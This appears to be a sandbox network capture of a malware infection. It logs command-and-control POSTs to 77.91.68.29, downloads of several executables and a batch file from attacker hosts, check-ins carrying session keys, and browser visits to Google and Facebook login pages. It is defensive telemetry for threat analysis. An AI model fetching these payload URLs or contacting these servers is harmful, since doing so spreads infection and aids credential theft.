77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://aapkmcm.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 166
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 01:47:55 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 54
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ocfhp.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 159
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 01:47:55 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ryaefgq.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 222
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 01:47:55 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://bwrykada.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 231
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 01:47:55 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 45
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ihdpee.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 311
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 01:47:57 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ypvboib.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 343
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 01:47:57 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 47
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://itthlc.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 233
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 01:47:57 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://yeosc.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 337
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 01:47:57 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 41
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://oalmuvsna.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 137
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 18 Sep 2023 01:47:58 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
GET

http://77.91.68.78/lend/build.exe

Remote address:

77.91.68.78:80

Request

GET /lend/build.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 77.91.68.78

Response

HTTP/1.1 200 OK

Date: Mon, 18 Sep 2023 01:47:54 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sun, 10 Sep 2023 15:00:11 GMT
ETag: "55600-6050277656643"
Accept-Ranges: bytes
Content-Length: 349696
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
GET

http://77.91.68.78/lend/deluxe_crypted.exe

Remote address:

77.91.68.78:80

Request

GET /lend/deluxe_crypted.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 77.91.68.78

Response

HTTP/1.1 200 OK

Date: Mon, 18 Sep 2023 01:47:55 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Thu, 14 Sep 2023 17:48:32 GMT
ETag: "67140-6055548cdb22d"
Accept-Ranges: bytes
Content-Length: 422208
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/x-msdos-program
GET

http://77.91.68.61/fuza/sunor.exe

Remote address:

77.91.68.61:80

Request

GET /fuza/sunor.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 77.91.68.61

Response

HTTP/1.1 200 OK

Date: Mon, 18 Sep 2023 01:47:55 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 18 Sep 2023 01:31:04 GMT
ETag: "1e8e0f-605981878c600"
Accept-Ranges: bytes
Content-Length: 2002447
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
GET

http://77.91.68.61/fuza/2.bat

Remote address:

77.91.68.61:80

Request

GET /fuza/2.bat HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 77.91.68.61

Response

HTTP/1.1 200 OK

Date: Mon, 18 Sep 2023 01:47:58 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 16 Sep 2023 19:17:49 GMT
ETag: "4f-6057ec3d4c0b6"
Accept-Ranges: bytes
Content-Length: 79
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

61.68.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

61.68.91.77.in-addr.arpa

IN PTR

Response

61.68.91.77.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
DNS

ji.alie3ksgdd.com

Remote address:

8.8.8.8:53

Request

ji.alie3ksgdd.com

IN A

Response

ji.alie3ksgdd.com

IN A

172.67.143.192

ji.alie3ksgdd.com

IN A

104.21.54.252
GET

http://ji.alie3ksgdd.com/m/ss41.exe

Remote address:

172.67.143.192:80

Request

GET /m/ss41.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: ji.alie3ksgdd.com

Response

HTTP/1.1 200 OK

Date: Mon, 18 Sep 2023 01:47:57 GMT
Content-Type: application/octet-stream
Content-Length: 305664
Connection: keep-alive
Last-Modified: Sun, 17 Sep 2023 10:02:13 GMT
ETag: "6506cea5-4aa00"
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 3861
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ekI8S3LaHM6JOqifYMS7R1x5WETjm6vW%2BoWBTYj3MI8qa4y83XMWAA%2BAfXAT6Hd%2BkbZoYu4U509oTPdRDpb%2ByBLZfKpJGWGOHj1iZ4phtMvW3C6p%2F%2B%2FcAVhnJb0Nxcm9bORHaQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8085ec83efd20b56-AMS
alt-svc: h3=":443"; ma=86400
DNS

91.179.33.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

91.179.33.162.in-addr.arpa

IN PTR

Response
DNS

192.143.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

192.143.67.172.in-addr.arpa

IN PTR

Response
DNS

z.nnnaajjjgc.com

EF40.exe

Remote address:

8.8.8.8:53

Request

z.nnnaajjjgc.com

IN A

Response

z.nnnaajjjgc.com

IN A

156.236.72.121
GET

https://z.nnnaajjjgc.com/sts/imagd.jpg

EF40.exe

Remote address:

156.236.72.121:443

Request

GET /sts/imagd.jpg HTTP/1.1
User-Agent: HTTPREAD
Host: z.nnnaajjjgc.com
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 18 Sep 2023 01:47:59 GMT
Content-Type: image/jpeg
Content-Length: 1507532
Last-Modified: Thu, 07 Sep 2023 13:47:29 GMT
Connection: keep-alive
ETag: "64f9d471-1700cc"
Accept-Ranges: bytes
DNS

121.72.236.156.in-addr.arpa

Remote address:

8.8.8.8:53

Request

121.72.236.156.in-addr.arpa

IN PTR

Response
DNS

api.ip.sb

E5C7.exe

Remote address:

8.8.8.8:53

Request

api.ip.sb

IN A

Response

api.ip.sb

IN CNAME

api.ip.sb.cdn.cloudflare.net

api.ip.sb.cdn.cloudflare.net

IN A

104.26.13.31

api.ip.sb.cdn.cloudflare.net

IN A

172.67.75.172

api.ip.sb.cdn.cloudflare.net

IN A

104.26.12.31
GET

https://api.ip.sb/ip

E5C7.exe

Remote address:

104.26.13.31:443

Request

GET /ip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 18 Sep 2023 01:47:59 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: keep-alive
vary: Accept-Encoding
Cache-Control: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E4v6bM6PV%2B5nIPt4b%2BqjpYnDkpsETqS4PWrWiZtyMpSb%2B%2F5kNAuHQOA9Sa3USGJ0lKIXtuM9zTqwtoNYyVqDskKzRcrm4turvnM4rJK3UMoYnZ0LyZQFrKgKzw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 8085ec9159931c8a-AMS
alt-svc: h3=":443"; ma=86400
DNS

25.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

25.113.215.185.in-addr.arpa

IN PTR

Response
DNS

8.3.197.209.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.3.197.209.in-addr.arpa

IN PTR

Response

8.3.197.209.in-addr.arpa

IN PTR

vip0x008map2sslhwcdnnet
DNS

147.174.42.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

147.174.42.23.in-addr.arpa

IN PTR

Response

147.174.42.23.in-addr.arpa

IN PTR

a23-42-174-147deploystaticakamaitechnologiescom
DNS

133.121.18.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.121.18.2.in-addr.arpa

IN PTR

Response

133.121.18.2.in-addr.arpa

IN PTR

a2-18-121-133deploystaticakamaitechnologiescom
DNS

31.13.26.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

31.13.26.104.in-addr.arpa

IN PTR

Response
DNS

www.facebook.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

www.facebook.com

IN A

Response

www.facebook.com

IN CNAME

star-mini.c10r.facebook.com

star-mini.c10r.facebook.com

IN A

157.240.247.35
DNS

app.nnnaajjjgc.com

EF40.exe

Remote address:

8.8.8.8:53

Request

app.nnnaajjjgc.com

IN A

Response

app.nnnaajjjgc.com

IN A

154.221.26.108
GET

http://app.nnnaajjjgc.com/check/safe

EF40.exe

Remote address:

154.221.26.108:80

Request

GET /check/safe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Host: app.nnnaajjjgc.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 18 Sep 2023 01:48:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.30
POST

http://app.nnnaajjjgc.com/check/?sid=339804&key=9f2b9058addb86a004980553a09f05de

EF40.exe

Remote address:

154.221.26.108:80

Request

POST /check/?sid=339804&key=9f2b9058addb86a004980553a09f05de HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Length: 160
Host: app.nnnaajjjgc.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 18 Sep 2023 01:48:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.30
GET

http://app.nnnaajjjgc.com/check/safe

EF40.exe

Remote address:

154.221.26.108:80

Request

GET /check/safe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Host: app.nnnaajjjgc.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 18 Sep 2023 01:48:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.30
POST

http://app.nnnaajjjgc.com/check/?sid=339808&key=83365f6912b44575f8e7710c60b65829

EF40.exe

Remote address:

154.221.26.108:80

Request

POST /check/?sid=339808&key=83365f6912b44575f8e7710c60b65829 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Length: 160
Host: app.nnnaajjjgc.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Mon, 18 Sep 2023 01:48:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.30
DNS

www.facebook.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

www.facebook.com

IN A

Response

www.facebook.com

IN CNAME

star-mini.c10r.facebook.com

star-mini.c10r.facebook.com

IN A

157.240.201.35
DNS

accounts.google.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

accounts.google.com

IN A

Response

accounts.google.com

IN A

142.250.179.141
GET

https://accounts.google.com/

MicrosoftEdgeCP.exe

Remote address:

142.250.179.141:443

Request

GET / HTTP/2.0
host: accounts.google.com
accept: text/html, application/xhtml+xml, image/jxr, */*
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 302

content-type: text/html; charset=UTF-8
strict-transport-security: max-age=31536000; includeSubDomains
set-cookie: __Host-GAPS=1:lszdvGtd-3K3ZyOAdwYhmTYALbR7Qw:tVzf0gcrQLIjPOsi;Path=/;Expires=Wed, 17-Sep-2025 01:48:05 GMT;Secure;HttpOnly;Priority=HIGH
x-frame-options: DENY
content-security-policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
location: https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F
content-encoding: gzip
date: Mon, 18 Sep 2023 01:48:05 GMT
expires: Mon, 18 Sep 2023 01:48:05 GMT
cache-control: private, max-age=0
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
content-length: 237
server: GSE
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
GET

https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F

MicrosoftEdgeCP.exe

Remote address:

142.250.179.141:443

Request

GET /ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F HTTP/2.0
host: accounts.google.com
accept: text/html, application/xhtml+xml, image/jxr, */*
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: __Host-GAPS=1:lszdvGtd-3K3ZyOAdwYhmTYALbR7Qw:tVzf0gcrQLIjPOsi

Response

HTTP/2.0 302

content-type: application/binary
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: Mon, 01 Jan 1990 00:00:00 GMT
date: Mon, 18 Sep 2023 01:48:05 GMT
location: https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AYZoVhf1sYd6miUBh3c50IsdOHhKCWljnPDNOWMTdHn2rr010GUjhSPOCEEC4Wg7Vek7FmZ5IBO2AQ
strict-transport-security: max-age=31536000; includeSubDomains
content-security-policy: require-trusted-types-for 'script';report-uri /_/AccountsSigninPassiveLoginHttp/cspreport
content-security-policy: script-src 'unsafe-inline' https: http:;object-src 'none';base-uri 'self';report-uri /_/AccountsSigninPassiveLoginHttp/cspreport;worker-src 'self'
cross-origin-resource-policy: cross-origin
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
permissions-policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
cross-origin-opener-policy: unsafe-none
server: ESF
content-length: 0
x-xss-protection: 0
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
GET

https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AYZoVhf1sYd6miUBh3c50IsdOHhKCWljnPDNOWMTdHn2rr010GUjhSPOCEEC4Wg7Vek7FmZ5IBO2AQ

MicrosoftEdgeCP.exe

Remote address:

142.250.179.141:443

Request

GET /InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AYZoVhf1sYd6miUBh3c50IsdOHhKCWljnPDNOWMTdHn2rr010GUjhSPOCEEC4Wg7Vek7FmZ5IBO2AQ HTTP/2.0
host: accounts.google.com
accept: text/html, application/xhtml+xml, image/jxr, */*
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: __Host-GAPS=1:lszdvGtd-3K3ZyOAdwYhmTYALbR7Qw:tVzf0gcrQLIjPOsi

Response

HTTP/2.0 302

content-type: text/html; charset=UTF-8
x-frame-options: DENY
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: Mon, 01 Jan 1990 00:00:00 GMT
date: Mon, 18 Sep 2023 01:48:05 GMT
location: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AYZoVhel2IOFstnzZBWuLx6rqjTm6mRC6t7PL5-k3BEI8hK8eaXqj3KTwQRYDdOsOfkNtopk8i0Tvw&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-435455321%3A1695001685950698&theme=glif
strict-transport-security: max-age=31536000; includeSubDomains
content-security-policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
content-security-policy: require-trusted-types-for 'script';report-uri /cspreport
report-to: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
cross-origin-opener-policy-report-only: same-origin; report-to="coop_gse_qebhlk"
content-encoding: gzip
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
content-length: 383
server: GSE
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
GET

https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AYZoVhel2IOFstnzZBWuLx6rqjTm6mRC6t7PL5-k3BEI8hK8eaXqj3KTwQRYDdOsOfkNtopk8i0Tvw&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-435455321%3A1695001685950698&theme=glif

MicrosoftEdgeCP.exe

Remote address:

142.250.179.141:443

Request

GET /v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AYZoVhel2IOFstnzZBWuLx6rqjTm6mRC6t7PL5-k3BEI8hK8eaXqj3KTwQRYDdOsOfkNtopk8i0Tvw&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-435455321%3A1695001685950698&theme=glif HTTP/2.0
host: accounts.google.com
accept: text/html, application/xhtml+xml, image/jxr, */*
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: __Host-GAPS=1:lszdvGtd-3K3ZyOAdwYhmTYALbR7Qw:tVzf0gcrQLIjPOsi

Response

HTTP/2.0 200

content-type: text/html; charset=utf-8
x-frame-options: DENY
set-cookie: __Host-GAPS=1:ExDJRuERE6HND8OYhetAJOEIhmu_rw:KTv1a75sNNk3TyBa; Expires=Wed, 17-Sep-2025 01:48:06 GMT; Path=/; Secure; HttpOnly; Priority=HIGH
vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
x-auto-login: realm=com.google&args=continue%3Dhttps://accounts.google.com/
x-ua-compatible: IE=edge
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: Mon, 01 Jan 1990 00:00:00 GMT
date: Mon, 18 Sep 2023 01:48:06 GMT
strict-transport-security: max-age=31536000; includeSubDomains
content-security-policy: require-trusted-types-for 'script';report-uri /v3/signin/_/AccountsSignInUi/cspreport
content-security-policy: script-src 'unsafe-inline' https: http:;object-src 'none';base-uri 'self';report-uri /v3/signin/_/AccountsSignInUi/cspreport;worker-src 'self'
cross-origin-resource-policy: same-site
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
permissions-policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
report-to: {"group":"AccountsSignInUi","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/AccountsSignInUi"}]}
cross-origin-opener-policy-report-only: same-origin; report-to="AccountsSignInUi"
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
DNS

www.facebook.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

www.facebook.com

IN A

Response

www.facebook.com

IN CNAME

star-mini.c10r.facebook.com

star-mini.c10r.facebook.com

IN A

157.240.196.35
GET

https://www.facebook.com/login

MicrosoftEdgeCP.exe

Remote address:

157.240.196.35:443

Request

GET /login HTTP/2.0
host: www.facebook.com
accept: text/html, application/xhtml+xml, image/jxr, */*
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: same-origin
cross-origin-opener-policy: unsafe-none
pragma: no-cache
cache-control: private, no-cache, no-store, must-revalidate
expires: Sat, 01 Jan 2000 00:00:00 GMT
x-content-type-options: nosniff
x-xss-protection: 0
x-frame-options: DENY
strict-transport-security: max-age=15552000; preload
content-type: text/html; charset="utf-8"
x-fb-debug: b6DG/D9nVz9MyWHC1JquZmqxWlakJ3uydAQ/czDUyuomj3dRqBG4YMA1BRUGK4ryACJJvuHDnNXv3Mk+ZAS7/A==
date: Mon, 18 Sep 2023 01:48:05 GMT
alt-svc: h3=":443"; ma=86400
GET

https://www.facebook.com/images/cookies/cookie_info_card_image_1.png

MicrosoftEdgeCP.exe

Remote address:

157.240.196.35:443

Request

GET /images/cookies/cookie_info_card_image_1.png HTTP/2.0
host: www.facebook.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
content-md5: Nmnpiyrpc00QHVchkNDJDQ==
edge-control: cache-maxage=86400s
expires: Mon, 18 Sep 2023 23:42:01 GMT
cache-control: public,max-age=86400
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
document-policy: force-load-at-top
